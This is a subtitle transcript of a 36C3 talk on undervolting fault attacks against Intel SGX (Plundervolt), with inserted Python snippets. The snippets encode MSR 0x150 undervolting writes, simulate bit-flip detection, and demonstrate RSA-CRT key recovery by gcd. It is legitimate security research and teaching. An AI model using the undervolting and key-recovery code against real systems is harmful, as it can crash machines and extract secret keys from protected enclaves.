1
00:00:20,400 --> 00:00:21,600
36C3 preroll music
2
00:00:21,600 --> 00:00:24,840
Herald Angel: OK. Welcome to our next
talk. It's called Flipping Bits from
3
00:00:24,840 --> 00:00:30,090
Software without Rowhammer. A small
reminder: Rowhammer was, and still is, a
4
00:00:30,090 --> 00:00:34,020
software-based fault attack. It was
published in 2015. There were
5
00:00:34,020 --> 00:00:39,660
countermeasures developed and we are still
in the process of deploying these
6
00:00:39,660 --> 00:00:45,690
everywhere. And now our two speakers are
going to talk about a new software-based
7
00:00:45,690 --> 00:00:56,250
fault attack to execute commands inside
the SGX environment. Our speakers,
8
00:00:56,250 --> 00:01:05,000
Professor Daniel Gruss from the University
of Graz and Kit Murdoch researching at the
9
00:01:05,000 --> 00:01:10,750
University of Birmingham. The content of
this talk is actually in her first
10
00:01:10,750 --> 00:01:17,030
published paper, published at IEEE, no,
accepted at IEEE Security and Privacy next
11
00:01:17,030 --> 00:01:21,210
year. In case you do not come from the
academic world: this is
12
00:01:21,210 --> 00:01:22,980
always a big deal. If this is your first
paper, it is even more so. Please welcome
13
00:01:22,980 --> 00:01:28,000
them. Give them both a round of applause
and enjoy the talk.
14
00:01:28,000 --> 00:01:31,190
Applause
15
00:01:31,190 --> 00:01:38,030
Kit Murdoch: Thank you. Hello. Let's get
started. This is my favorite recent
16
00:01:38,030 --> 00:01:45,270
attack. It's called CLKSCREW. And the
reason that it's my favorite is it created
17
00:01:45,270 --> 00:01:50,140
a new class of fault attacks. Daniel
Gruss: Fault attacks. I, I know that.
18
00:01:50,140 --> 00:01:53,670
Fault attacks, you take these
oscilloscopes and check the voltage line
19
00:01:53,670 --> 00:01:58,340
and then you drop the voltage for a f....
Kit: No, you see, this is why this one is
20
00:01:58,340 --> 00:02:04,810
cool because you don't need any equipment
at all. Adrian Tang. He created this
21
00:02:04,810 --> 00:02:09,700
wonderful attack that uses DVFS. What is
that?
22
00:02:09,700 --> 00:02:13,400
Daniel: DVFS? I don't know... Don't
Violate Format Specifications.
23
00:02:13,400 --> 00:02:19,230
Kit: I asked my boyfriend this morning
what he thought DVFS stood for and he said
24
00:02:19,230 --> 00:02:22,230
Darth Vader Fights Skywalker.
Laughter
25
00:02:22,230 --> 00:02:26,290
Kit: I'm also wearing his t-shirt
specially for him as well.
26
00:02:26,290 --> 00:02:30,340
Daniel: Maybe, maybe this is more
technical, maybe Dazzling Volt For
27
00:02:30,340 --> 00:02:34,590
Security, like SGX.
Kit: No, it's not that either. Mine was,
28
00:02:34,590 --> 00:02:39,650
the one I came up with this morning was: Drink
Vodka, Feel Silly.
29
00:02:39,650 --> 00:02:42,930
Laughter
Kit: It's not that either. It stands for
30
00:02:42,930 --> 00:02:48,590
dynamic voltage and frequency scaling. And
what that means really simply is changing
31
00:02:48,590 --> 00:02:53,081
the voltage and changing the frequency of
your CPU. Why do you want to do this? Why
32
00:02:53,081 --> 00:02:58,269
would anyone want to do this? Well, gamers
want fast computers. I am sure there are a
33
00:02:58,269 --> 00:03:02,860
few people out here who will want a really
fast computer. Cloud servers want high
34
00:03:02,860 --> 00:03:07,750
assurance and low running costs. And what
do you do if your hardware gets hot?
35
00:03:07,750 --> 00:03:13,040
You're going to need to modify them. And
actually finding a voltage and frequency
36
00:03:13,040 --> 00:03:17,810
that work together is pretty difficult.
And so what the manufacturers have done to
37
00:03:17,810 --> 00:03:23,230
make this easier, is they've created a way
to do this from software. They created
38
00:03:23,230 --> 00:03:29,409
memory mapped registers. You modify this
from software and it has an impact on the
39
00:03:29,409 --> 00:03:35,069
hardware. And that's what this wonderful
CLKSCREW attack did. But they found
40
00:03:35,069 --> 00:03:41,939
something else out, which you may have
heard of: TrustZone. TrustZone is an
41
00:03:41,939 --> 00:03:47,850
enclave in ARM chips that should be able
to protect your data. But if you can
42
00:03:47,850 --> 00:03:52,360
modify the frequency and voltage of the
whole core, then you can modify it for
43
00:03:52,360 --> 00:03:59,219
both TrustZone and normal code. And this
is their attack. In software they modified
44
00:03:59,219 --> 00:04:05,290
the frequency to make it outside of the
normal operating range. And they induced
45
00:04:05,290 --> 00:04:12,459
faults. And so in an ARM chip running on a
mobile phone, they managed to get out an
46
00:04:12,459 --> 00:04:17,511
AES key from within TrustZone. They
should not be able to do that. They were
47
00:04:17,511 --> 00:04:22,710
able to trick TrustZone into loading a
self-signed app. You should not be able to
48
00:04:22,710 --> 00:04:31,900
do that. That made this ARM attack really
interesting. This year another attack came
49
00:04:31,900 --> 00:04:39,879
out called VoltJockey. This also attacked
ARM chips. But instead of looking at
50
00:04:39,879 --> 00:04:49,460
frequency on ARM chips, they were looking
at voltage on ARM chips. We're thinking,
51
00:04:49,460 --> 00:04:57,270
what about Intel?
Daniel: OK, so Intel. Actually, I know
52
00:04:57,270 --> 00:05:02,060
something about Intel because I had this
nice laptop from HP. I really liked it,
53
00:05:02,060 --> 00:05:06,520
but it had this problem that it was getting
too hot all the time and I couldn't even
54
00:05:06,520 --> 00:05:12,909
work without it shutting down all the time
because of the heat problem. So what I did
55
00:05:12,909 --> 00:05:17,639
was I undervolted the CPU and actually
this worked for me for several years. I
56
00:05:17,639 --> 00:05:21,530
used it undervolted for several years.
You can also see this, I just took this
57
00:05:21,530 --> 00:05:27,020
from somewhere on the Internet and they
compared with undervolting and without
58
00:05:27,020 --> 00:05:31,930
undervolting. And you can see that the
benchmark score improves by undervolting
59
00:05:31,930 --> 00:05:38,879
because you don't run into the thermal
throttling that often. So there are
60
00:05:38,879 --> 00:05:43,840
different tools to do that. On Windows you
could use RMClock, there's also
61
00:05:43,840 --> 00:05:47,789
Throttlestop. On Linux there's the
linux-intel-undervolt GitHub repository.
62
00:05:47,789 --> 00:05:52,960
Kit: And there's one more, actually.
Adrian Tang, who, I don't know if you can tell, I'm
63
00:05:52,960 --> 00:05:58,889
a bit of a fan of. He was the lead author on
CLKSCREW. He wrote his PhD thesis and
64
00:05:58,889 --> 00:06:03,210
in the appendix he talked about
undervolting on Intel machines and how you
65
00:06:03,210 --> 00:06:07,550
do it. And I wish I'd read that before I
started the paper. That would have saved
66
00:06:07,550 --> 00:06:12,409
an awful lot of time. But thank you to the
people on the Internet for making my life
67
00:06:12,409 --> 00:06:17,980
a lot easier, because what we discovered
was there is this magic model-specific
68
00:06:17,980 --> 00:06:26,880
register, and it's called hex 150. And this
enables you to change the voltage. The
69
00:06:26,880 --> 00:06:31,229
people on the Internet did the work for
me. So I know how it works. You first of
70
00:06:31,229 --> 00:06:37,039
all tell it the plane index, what it is you
want to raise or lower the
71
00:06:37,039 --> 00:06:43,099
voltage. We discovered that the core and
the cache are on the same plane. So you
72
00:06:43,099 --> 00:06:46,509
have to modify them both; modifying just one
has no effect, they go together. I guess in the
73
00:06:46,509 --> 00:06:50,750
future they'll be separate. Then you
modify the offset to say, I want to raise
74
00:06:50,750 --> 00:06:57,080
it by this much or lower it by this much.
So I thought, let's have a go. Let's write
75
00:06:57,080 --> 00:07:05,599
a little bit of code. Here is the code.
The smart people amongst you may have
76
00:07:05,599 --> 00:07:15,539
noticed something. I suspect, even with my
appalling C, even I would recognize that
77
00:07:15,539 --> 00:07:20,810
that loop should never exit. I'm just
multiplying the same thing again and again
78
00:07:20,810 --> 00:07:25,499
and again and again and again and
expecting it to exit. That shouldn't
79
00:07:25,499 --> 00:07:32,439
happen. But let's look at what happened.
So I'm gonna show you what I did. Oh..
80
00:07:32,439 --> 00:07:41,620
There we go. So the first thing I'm gonna
do is I'm going to set the frequency to be
81
00:07:41,620 --> 00:07:45,749
one thing because I'm gonna play with
voltage and if I'm gonna play with
82
00:07:45,749 --> 00:07:51,210
voltage, I want the frequency to be
set. So, it's quite easy using cpupower:
83
00:07:51,210 --> 00:07:56,530
you set the maximum and the minimum to be
1 gigahertz. And now my machine is running
84
00:07:56,530 --> 00:08:01,169
at exactly 1 gigahertz. Now we'll look at
the bit of code that you need to
85
00:08:01,169 --> 00:08:05,091
undervolt, again I didn't do the work,
thank you to the people on the internet
86
00:08:05,091 --> 00:08:12,199
for doing this. You load the msr module into the
kernel and let's have a look at the code.
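The interface just described can be sketched in code. The bit layout below follows the community's reverse engineering of MSR 0x150 (as used by tools like linux-intel-undervolt), not official Intel documentation, and the helper names are made up for illustration: a 64-bit value packs a plane index, write-command bits, and a signed 11-bit voltage offset in units of 1/1024 V.

```python
# Sketch of the MSR 0x150 undervolting interface, following the
# format reverse-engineered by the community (e.g. the
# linux-intel-undervolt project). Assumptions, not official docs.
import os

def encode_undervolt(plane: int, offset_mv: float) -> int:
    """Build the 64-bit value written to MSR 0x150.

    plane: voltage plane index (0 = core, 2 = cache, ...)
    offset_mv: voltage offset in millivolts (negative = undervolt)
    """
    # The offset is a signed 11-bit value in units of 1/1024 V,
    # stored in bits 21..31; bits 63/36/32 form the write command.
    steps = round(offset_mv * 1.024)
    base = (1 << 63) | (1 << 36) | (1 << 32)
    return base | (plane << 40) | ((steps & 0x7FF) << 21)

def write_msr(value: int, cpu: int = 0) -> None:
    """Write the value via /dev/cpu/N/msr (needs root + `modprobe msr`)."""
    fd = os.open(f"/dev/cpu/{cpu}/msr", os.O_WRONLY)
    try:
        # The msr driver uses the file offset as the MSR address.
        os.pwrite(fd, value.to_bytes(8, "little"), 0x150)
    finally:
        os.close(fd)

# Core (plane 0) and cache (plane 2) sit on the same voltage plane
# here, so both are set to the same -252 mV offset.
for plane in (0, 2):
    value = encode_undervolt(plane, -252)
    # write_msr(value)  # uncomment on a machine you are happy to crash
```

The actual write is left commented out, since running it undervolts the live CPU.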
87
00:08:12,199 --> 00:08:21,030
Does that look right? Oh, it does, looks
much better up there. Yes, it's that one
88
00:08:21,030 --> 00:08:27,061
line of code. That is the one line of code
you need to open it, and then we're going to
89
00:08:27,061 --> 00:08:33,140
write to it. And again, oh why is it doing
that? We have a touch sensitive screen
90
00:08:33,140 --> 00:08:52,670
here. Might touch it again. That's the
line of code that's gonna open it and
91
00:08:52,670 --> 00:08:55,970
that's how you write to it. And again, the
people on the Internet did the work for me
92
00:08:55,970 --> 00:08:59,030
and told me how I had to write that. So
what I can do here is I'm just going to
93
00:08:59,030 --> 00:09:04,250
undervolt and I'm gonna undervolt,
multiplying deadbeef by this really big
94
00:09:04,250 --> 00:09:08,660
number. I'm starting at minus two hundred
and fifty two millivolts. And we're just
95
00:09:08,660 --> 00:09:11,140
going to see if I ever get out of this
loop.
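The loop in question can be sketched as follows. This is a simulation of the detection logic only, with hypothetical names and an artificially injected bit flip, since Python on a healthy machine will never see a real undervolting fault; the point is that the loop exiting at all signals a faulty multiplication.

```python
# Sketch of the fault-detection loop from the talk: multiply the
# same operands over and over and exit only when the product
# disagrees with the precomputed result. The flip is injected here
# to demonstrate the check; operands are illustrative assumptions.

OPERAND_A = 0xDEADBEEF
OPERAND_B = 0x1122334455667788
EXPECTED = OPERAND_A * OPERAND_B  # computed once, assumed correct

def multiply(a: int, b: int, flip_at: int, i: int) -> int:
    product = a * b
    if i == flip_at:        # simulate a hardware fault: flip one bit
        product ^= 1 << 32
    return product

def run_loop(flip_at: int):
    i = 0
    while True:
        result = multiply(OPERAND_A, OPERAND_B, flip_at, i)
        if result != EXPECTED:            # the loop "should never exit"...
            return i, result ^ EXPECTED   # ...unless a fault occurred
        i += 1

iteration, flipped_bits = run_loop(flip_at=1000)
print(f"fault after {iteration} iterations, flipped bits: {flipped_bits:#x}")
```

In the real attack the same comparison runs in C under undervolting, and the XOR of the faulty and correct products shows which bits flipped.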
96
00:09:11,140 --> 00:09:14,020
Daniel: But surely the system would just
crash, right?
97
00:09:14,020 --> 00:09:21,880
Kit: You'd hope so, wouldn't you? Let's
see, there we go! We got a fault. I was a
98
00:09:21,880 --> 00:09:25,070
bit gobsmacked when that happened because
the system didn't crash.
99
00:09:25,070 --> 00:09:29,790
Daniel: So that doesn't look too good. So
the question now is, what is the... So you
100
00:09:29,790 --> 00:09:33,050
show some voltage here, some undervolting.
Kit: Yeah
101
00:09:33,050 --> 00:09:36,690
Daniel: What undervolting is actually
required to get a bit flip?
102
00:09:36,690 --> 00:09:40,760
Kit: We did a lot of tests. We didn't just
multiply by deadbeef. We also multiplied
103
00:09:40,760 --> 00:09:44,860
by random numbers. So here I'm going to
just generate two random numbers. One is
104
00:09:44,860 --> 00:09:50,210
going up to ffffff, one is going up to
ff. I'm just going to try different values, again
105
00:09:50,210 --> 00:09:57,450
I'm going to try undervolting to see if I
get different bit flips. And again, I got
106
00:09:57,450 --> 00:10:03,620
the same bit flipped, so I'm getting the
same one single bit flip there. Okay, so
107
00:10:03,620 --> 00:10:08,000
maybe it's only ever going to be one bit
flip. Ah, I got a different bit flip and
108
00:10:08,000 --> 00:10:12,210
again a different bit flip and it's,
you'll notice they always appear to be
109
00:10:12,210 --> 00:10:17,060
bits next to one another. So, to
answer Daniel's question: I stressed my
110
00:10:17,060 --> 00:10:22,980
machine a lot in the process of doing
this, but I wanted to know what were good
111
00:10:22,980 --> 00:10:29,330
values to undervolt at. And here they are.
We tried for all the frequencies. We tried
112
00:10:29,330 --> 00:10:33,290
what the base voltage was, and then what
was the point at which we got the first
113
00:10:33,290 --> 00:10:37,530
fault? And once we'd done that, it made
everything really easy. We just made sure
114
00:10:37,530 --> 00:10:41,430
we didn't go under that and end up with
a kernel panic or the machine crashing.
115
00:10:41,430 --> 00:10:47,160
Daniel: So this is already great. I think
this looks like it is exploitable and the
116
00:10:47,160 --> 00:10:53,910
first thing that you need when you are
working on a vulnerability is the name and
117
00:10:53,910 --> 00:11:00,821
the logo and maybe a website. Everything
like that. And real people on the Internet
118
00:11:00,821 --> 00:11:05,690
agree with me. Like this tweet.
Laughter
119
00:11:05,690 --> 00:11:12,160
Daniel: Yes. So we need a name and a logo.
Kit: No, no, we don't need it. Come on
120
00:11:12,160 --> 00:11:15,121
then. Go on then. What is your idea?
Daniel: So I thought this is like, it's
121
00:11:15,121 --> 00:11:20,920
like Rowhammer. We are flipping bits, but
with voltage. So I called it Volthammer
122
00:11:20,920 --> 00:11:25,370
and I already have a logo for it.
Kit: We're not, we're not giving it a
123
00:11:25,370 --> 00:11:27,580
logo.
Daniel: No, I think we need a logo because
124
00:11:27,580 --> 00:11:34,880
people can relate more to the images
there, to the logo that we have. Reading a
125
00:11:34,880 --> 00:11:39,140
word is much more complicated than seeing
a logo somewhere. It's better for
126
00:11:39,140 --> 00:11:45,480
communication. You make it easier to talk
about your vulnerability. Yeah? And the
127
00:11:45,480 --> 00:11:50,070
name, same thing. How, how would you like
to call it? Like undervolting on Intel to
128
00:11:50,070 --> 00:11:54,350
induce flips in multiplications to then
run an exploit? No, that's not a good
129
00:11:54,350 --> 00:12:02,250
vulnerability name. And speaking of the
name, if we choose a fancy name, we might
130
00:12:02,250 --> 00:12:05,550
even make it into TV shows, like
Rowhammer.
131
00:12:05,550 --> 00:12:11,740
Video Clip 1A: The hacker used a DRAM
Rowhammer exploit to gain kernel privileges.
132
00:12:11,740 --> 00:12:15,050
Video Clip 1B: HQ, yeah we've got
something.
133
00:12:15,050 --> 00:12:20,690
Daniel: So this was in Designated Survivor
in March 2018 and this guy just got shot.
134
00:12:20,690 --> 00:12:25,601
So hopefully we won't get shot, but
actually we have also been working on this. My
135
00:12:25,601 --> 00:12:32,830
group has been working on Rowhammer and
presented this in 2015 here at CCC, in
136
00:12:32,830 --> 00:12:37,500
Hamburg back then. It was Rowhammer.js and
we called it root privileges for web
137
00:12:37,500 --> 00:12:40,661
apps because we showed that you can do
this from JavaScript in a browser. Looks
138
00:12:40,661 --> 00:12:44,170
pretty much like this: we hammered the
memory a bit and then we see bit flips
139
00:12:44,170 --> 00:12:49,690
in the memory. So how does this work?
Because Rowhammer is the only
140
00:12:49,690 --> 00:12:52,800
other software-based fault attack that we
know. These undervolting attacks
141
00:12:52,800 --> 00:12:59,370
are related to DVFS, and this is a
different effect. So what we
142
00:12:59,370 --> 00:13:03,870
do here is we look at the DRAM and the
DRAM is organized in multiple rows and we
143
00:13:03,870 --> 00:13:10,050
will access these rows. These rows consist
of so-called cells, which are capacitors
144
00:13:10,050 --> 00:13:14,450
and transistors each. And they store one
bit of information each. And the row
145
00:13:14,450 --> 00:13:18,320
buffer, the row size usually is something
like eight kilobytes. And then when you
146
00:13:18,320 --> 00:13:21,970
read something, you copy it to the row
buffer. So it works pretty much like this:
147
00:13:21,970 --> 00:13:25,820
You read from a row, you copy it to the
row buffer. The problem now is, these
148
00:13:25,820 --> 00:13:31,000
capacitors leak over time, so you need to
refresh them frequently. They also have
149
00:13:31,000 --> 00:13:37,660
a maximum refresh interval, defined in
a standard, to guarantee data integrity.
150
00:13:37,660 --> 00:13:43,150
Now the problem is that cells leak fast
upon proximate accesses, and that means if
151
00:13:43,150 --> 00:13:49,450
you access two locations in proximity to a
third location, then the third location
152
00:13:49,450 --> 00:13:54,110
might flip a bit without accessing it. And
this has been exploited in different
153
00:13:54,110 --> 00:13:58,710
exploits. So there are some usual strategies;
maybe, maybe we can use some of them. So
154
00:13:58,710 --> 00:14:03,370
the usual strategies here are searching
for a page with a bit flip. So you search
155
00:14:03,370 --> 00:14:08,230
for it and then you find some. Ah, there
is a flip here. Then you release the page
156
00:14:08,230 --> 00:14:13,180
with the flip in the next step. Now this
memory is free and now you allocate a lot
157
00:14:13,180 --> 00:14:17,710
of target pages, for instance, page
tables, and then you hope that the target
158
00:14:17,710 --> 00:14:22,460
page is placed there. If it's a page
table, for instance, like this and you
159
00:14:22,460 --> 00:14:26,650
induce a bit flip. So before it was
pointing to a user page, then it was
160
00:14:26,650 --> 00:14:32,540
pointing to no page at all, because we
maybe unmapped it. And the page where we
161
00:14:32,540 --> 00:14:37,850
use the bit flip now is actually the one
storing all of the PTEs here. So the one
162
00:14:37,850 --> 00:14:42,990
in the middle is stored down there. And
this one now has a bit flip and then our
163
00:14:42,990 --> 00:14:49,650
pointer to our own user page changes due
to the bit flip and points to hopefully
164
00:14:49,650 --> 00:14:54,990
another page table because we filled that
memory with page tables. Another direction
165
00:14:54,990 --> 00:15:01,840
that we could go here is flipping bits in
code. For instance, if you think about a
166
00:15:01,840 --> 00:15:07,370
password comparison, you might have a jump
equal check here and the jump equal check
167
00:15:07,370 --> 00:15:13,190
if you flip one bit, it transforms into a
different instruction. And fortunately, oh
168
00:15:13,190 --> 00:15:18,290
this already looks interesting. Ah,
perfect. Changing the password check into a
169
00:15:18,290 --> 00:15:25,670
password incorrect check. I will always be
root. And yeah, that's basically it. So
170
00:15:25,670 --> 00:15:30,700
these are two directions that we might
look at for Row hammer. That's also maybe
171
00:15:30,700 --> 00:15:35,030
a question for Row hammer, why would we
even care about other fault attacks?
172
00:15:35,030 --> 00:15:39,820
Because Rowhammer works on DDR3, it
works on DDR4, it works on ECC memory.
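The code-flip direction described a moment ago can be made concrete. A small sketch with illustrative bytes (not code from the talk): the x86 short-jump opcodes for JE (0x74) and JNE (0x75) differ in exactly one bit, so a single flip inverts a password check.

```python
# Illustration of the jump-instruction bit flip described above:
# the x86 short-jump opcodes JE (0x74) and JNE (0x75) differ in a
# single bit, so one flipped bit inverts the branch of a check.

JE, JNE = 0x74, 0x75
assert JE ^ JNE == 0b1  # exactly one bit apart

def flip_bit(code: bytes, byte_index: int, bit: int) -> bytes:
    """Return a copy of `code` with one bit flipped."""
    patched = bytearray(code)
    patched[byte_index] ^= 1 << bit
    return bytes(patched)

# cmp eax, ebx; je +5  -- hypothetical snippet guarding a check
snippet = bytes([0x39, 0xD8, JE, 0x05])
flipped = flip_bit(snippet, byte_index=2, bit=0)  # je becomes jne
print(f"before: {snippet.hex()}  after: {flipped.hex()}")
```

Flipping the same bit again restores the original instruction, which is why a single Rowhammer-style flip is enough to invert the logic.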
173
00:15:39,820 --> 00:15:47,840
Kit: Does it, how does it deal with SGX?
Daniel: Ahh yeah, yeah SGX. Ehh, yes. So
174
00:15:47,840 --> 00:15:51,420
maybe we should first explain what SGX is.
Kit: Yeah, go for it.
175
00:15:51,420 --> 00:15:56,530
Daniel: SGX is a so-called TEE, a trusted
execution environment, on Intel processors,
176
00:15:56,530 --> 00:16:01,660
and Intel designed it in such a way that you
have an untrusted part, and this runs on
177
00:16:01,660 --> 00:16:05,880
top of an operating system, inside an
application. And inside the application
178
00:16:05,880 --> 00:16:10,660
you can now create an enclave and the
enclave runs in a trusted part, which is
179
00:16:10,660 --> 00:16:16,790
supported by the hardware. The hardware is
the trust anchor for this trusted enclave
180
00:16:16,790 --> 00:16:20,040
and the enclave. Now, from the
untrusted part, you can call into the
181
00:16:20,040 --> 00:16:24,910
enclave via a call gate, pretty much like a
system call. And in there you execute a
182
00:16:24,910 --> 00:16:31,670
trusted function. Then you return to this
untrusted part and then you can continue
183
00:16:31,670 --> 00:16:35,330
doing other stuff. And the operating
system has no direct access to this
184
00:16:35,330 --> 00:16:40,020
trusted part. This is also protected
against all kinds of other attacks. For
185
00:16:40,020 --> 00:16:44,290
instance, physical attacks. If you look at
the memory that it uses, maybe I have 16
186
00:16:44,290 --> 00:16:50,100
gigabytes of RAM. Then there is a small
region for the EPC, the enclave page
187
00:16:50,100 --> 00:16:55,040
cache, the memory that enclaves use and
it's encrypted and integrity protected and
188
00:16:55,040 --> 00:16:59,500
I can't tamper with it. So for instance,
if I want to mount a cold boot attack,
189
00:16:59,500 --> 00:17:04,350
pull out the DRAM, put it in another
machine and read out what content it has.
190
00:17:04,350 --> 00:17:07,970
I can't do that because it's encrypted.
And I don't have the key. The key is in
191
00:17:07,970 --> 00:17:14,939
the processor. Quite bad for an attacker. So, what happens
if we have bit flips in the EPC? Good
192
00:17:14,939 --> 00:17:21,839
question. We tried that. The integrity
check fails. It locks up the memory
193
00:17:21,839 --> 00:17:27,280
controller, which means no further memory
accesses whatsoever run through this
194
00:17:27,280 --> 00:17:33,990
system. Everything stays where it is and
the system basically halts. It's not an
195
00:17:33,990 --> 00:17:41,420
exploit, it's just a denial of service.
Kit: Huh. So maybe SGX can save us. So
196
00:17:41,420 --> 00:17:47,360
what I want to know is: Rowhammer clearly
failed because of the integrity check.
197
00:17:47,360 --> 00:17:51,830
My attack, where I can flip bits, is this
gonna work inside SGX?
198
00:17:51,830 --> 00:17:55,040
Daniel: I don't think so because they
have integrity protection, right?
199
00:17:55,040 --> 00:17:59,540
Kit: So what I'm gonna do is run the same
thing. On the right-hand side is user
200
00:17:59,540 --> 00:18:03,750
space, on the left-hand side is the
enclave. As you can see, I'm running at
201
00:18:03,750 --> 00:18:12,280
minus 261 millivolts. No error minus 262.
No error minus 2... fingers crossed we
202
00:18:12,280 --> 00:18:20,920
don't get a kernel panic. Do you see that
thing at the bottom? That's a bit flip
203
00:18:20,920 --> 00:18:24,760
inside the enclave. Oh, yeah.
Daniel: That's bad.
204
00:18:24,760 --> 00:18:29,910
Applause
Kit: Thank you. Yeah and it's the same
205
00:18:29,910 --> 00:18:33,920
bit flip that I was getting in user
space, which is also really interesting.
206
00:18:33,920 --> 00:18:38,251
Daniel: I have an idea. So, it's
surprising that it works, right? But I have
207
00:18:38,251 --> 00:18:45,080
an idea. This is basically doing the same
thing as CLKSCREW, but on SGX, right?
208
00:18:45,080 --> 00:18:47,320
Kit: Yeah.
Daniel: And I thought maybe you didn't
209
00:18:47,320 --> 00:18:51,570
like the previous logo, maybe it was just
too much. So I came up with something more
210
00:18:51,570 --> 00:18:52,800
simple...
Kit: You've come up with a new... He's
211
00:18:52,800 --> 00:18:55,790
come up with a new name.
Daniel: Yes, SGX Screw. How do you like
212
00:18:55,790 --> 00:18:59,001
it?
Kit: No, we don't even have an attack. We
213
00:18:59,001 --> 00:19:02,150
can't have a logo before we have an
attack.
214
00:19:02,150 --> 00:19:07,350
Daniel: The logo is important, right? I
mean, how would you present this on a
215
00:19:07,350 --> 00:19:08,670
website
without a logo?
216
00:19:08,670 --> 00:19:11,770
Kit: Well, first of all, I need an attack.
What am I going to attack with this?
217
00:19:11,770 --> 00:19:15,060
Daniel: I have an idea what we could
attack. So, for instance, we could attack
218
00:19:15,060 --> 00:19:22,300
crypto, RSA. RSA is a crypto algorithm.
It's a public key crypto algorithm. And
219
00:19:22,300 --> 00:19:28,280
you can encrypt or sign messages. You can
send this over an untrusted channel. And
220
00:19:28,280 --> 00:19:35,560
then you can also verify. So this is
actually a typo, which should be decrypt...
221
00:19:35,560 --> 00:19:43,230
there: encrypt or verify messages with the
public key, or decrypt or sign messages with the
222
00:19:43,230 --> 00:19:53,590
private key. So how does this work? Yeah,
basically it's based on exponentiation modulo a
223
00:19:53,590 --> 00:20:01,270
number and this number is computed from
two prime numbers. So you, for the
224
00:20:01,270 --> 00:20:09,360
signature part, which is similar to the
decryption basically, you take the hash of
225
00:20:09,360 --> 00:20:17,760
the message and then take it to the power
of d modulo n, the public modulus, and
226
00:20:17,760 --> 00:20:26,390
then you have the signature, and everyone
can verify this later on,
227
00:20:26,390 --> 00:20:34,430
because the exponent part
is public. And n is also public, so we can
228
00:20:34,430 --> 00:20:39,880
later on do this. Now there is one
optimization which is quite nice, which is
229
00:20:39,880 --> 00:20:44,541
Chinese remainder theorem. And this part
is really expensive. It takes a long time.
230
00:20:44,541 --> 00:20:51,000
So it's a lot faster, if you split this in
multiple parts. For instance, if you split
231
00:20:51,000 --> 00:20:56,320
it in two parts, you do two of those
exponentiations, but with different
232
00:20:56,320 --> 00:21:02,100
numbers, with smaller numbers and then it's
cheaper. It takes fewer rounds. And if you
233
00:21:02,100 --> 00:21:06,880
do that, you of course have to adapt the
formula up here to compute the signature
234
00:21:06,880 --> 00:21:12,510
because you now put it together out of
the two pieces of the signature that you
235
00:21:12,510 --> 00:21:19,390
compute. OK, so this looks quite
complicated, but the point is we want to
236
00:21:19,390 --> 00:21:26,690
mount a fault attack on this. So what
happens if we fault this? Let's assume we
237
00:21:26,690 --> 00:21:36,130
have two signatures which are not
identical. Right, S and S', and we
238
00:21:36,130 --> 00:21:41,120
basically only need to know that in one of
them, a fault occurred. So the first is
239
00:21:41,120 --> 00:21:45,140
something, the other is something else. We
don't care. But what you see here is that
240
00:21:45,140 --> 00:21:51,510
both are something multiplied by q, plus s2. And if
you subtract one from the other, what do
241
00:21:51,510 --> 00:21:56,970
you get? You get something multiplied by
q. There is something else that is a
242
00:21:56,970 --> 00:22:03,480
multiple of q, which is n, p times q, and n is
public. So what we can do now is we can
243
00:22:03,480 --> 00:22:09,640
compute the greatest common divisor of
this and n and get q.
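The derivation above can be checked numerically. This is a toy sketch with tiny illustrative primes (not the demo code): sign with RSA-CRT, inject a fault into the p-half of one signature, and recover the secret prime q as gcd(s - s', n).

```python
# Toy check of the RSA-CRT fault attack described above: a fault in
# the s_p half of a CRT signature lets us recover the secret prime q
# as gcd(s - s', n). Tiny illustrative primes, not real key sizes.
from math import gcd

p, q = 1009, 1013                  # secret primes (toy sizes)
n = p * q                          # public modulus
e = 17
d = pow(e, -1, (p - 1) * (q - 1))  # private exponent

def sign_crt(m: int, fault: bool = False) -> int:
    # Two small exponentiations instead of one big one.
    s_p = pow(m, d % (p - 1), p)
    s_q = pow(m, d % (q - 1), q)
    if fault:
        s_p ^= 1                   # single bit flip in the p-half
    # Recombination: s = s_q + q * ((s_p - s_q) * q^-1 mod p)
    h = (pow(q, -1, p) * (s_p - s_q)) % p
    return s_q + q * h

m = 123456 % n
s_good = sign_crt(m)
s_bad = sign_crt(m, fault=True)

assert pow(s_good, e, n) == m      # correct signature verifies
assert pow(s_bad, e, n) != m       # the faulty one does not

# Both signatures are s_q plus a multiple of q, so their difference
# is a multiple of q, and n = p*q is public.
q_recovered = gcd(s_good - s_bad, n)
print("recovered q:", q_recovered)
```

With q recovered, p = n // q follows immediately, which is exactly what the demo later pulls out of the enclave.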
244
00:22:09,640 --> 00:22:14,730
Kit: Okay. So I'm interested to see if...
I didn't understand a word of that, but
245
00:22:14,730 --> 00:22:19,890
I'm interested to see if I can use this to
mount an attack. So how am I going to do
246
00:22:19,890 --> 00:22:25,690
this? Well, I'll write a little RSA
decrypt program and what I'll do is I use
247
00:22:25,690 --> 00:22:32,330
the same bit of multiplication that I've
been using before. And when I get a bit
248
00:22:32,330 --> 00:22:39,280
flip, then I'll do the decryption. All
this is happening inside SGX, inside the
249
00:22:39,280 --> 00:22:44,141
enclave. So let's have a look at this.
First of all, I'll show you the code that
250
00:22:44,141 --> 00:22:51,580
I wrote, again copied from the Internet.
Thank you. So there it is, I'm going to
251
00:22:51,580 --> 00:22:56,380
trigger the fault. I'm going to wait for
the triggered fault, then I'm going to do
252
00:22:56,380 --> 00:23:00,870
a decryption. Well, let's have a quick
look at the code, which should be exactly
253
00:23:00,870 --> 00:23:04,970
the same as it was right at the very
beginning when we started this. Yeah.
254
00:23:04,970 --> 00:23:10,240
There's my deadbeef written slightly
differently. But there is my deadbeef. So,
255
00:23:10,240 --> 00:23:13,730
now this is ever so slightly messy on the
screen, but I hope you're going to see
256
00:23:13,730 --> 00:23:22,850
this. So minus 239. Fine. Still fine.
Still fine. I'll just pause there. You can
257
00:23:22,850 --> 00:23:27,360
see at the bottom I've written "meh - all
fine", if you're wondering. So what we're
258
00:23:27,360 --> 00:23:33,059
looking at here is a correct decryption
and you can see inside the enclave, I'm
259
00:23:33,059 --> 00:23:38,340
initializing p and I'm initializing q. And
those are part of the private key. I
260
00:23:38,340 --> 00:23:43,960
shouldn't be able to get those. So minus 239
isn't really working. Let's try going up
261
00:23:43,960 --> 00:23:49,309
to minus 240. Oh oh oh oh! RSA error, RSA
error. Exciting!
262
00:23:49,309 --> 00:23:51,680
Daniel: Okay, So this should work for the
attack then.
263
00:23:51,680 --> 00:23:57,370
Kit: So let's have a look, again. I copied
somebody's attack from the Internet, which
264
00:23:57,370 --> 00:24:04,210
they very kindly shared. It's called the Lenstra
attack. And again, I got an output.
265
00:24:04,210 --> 00:24:08,150
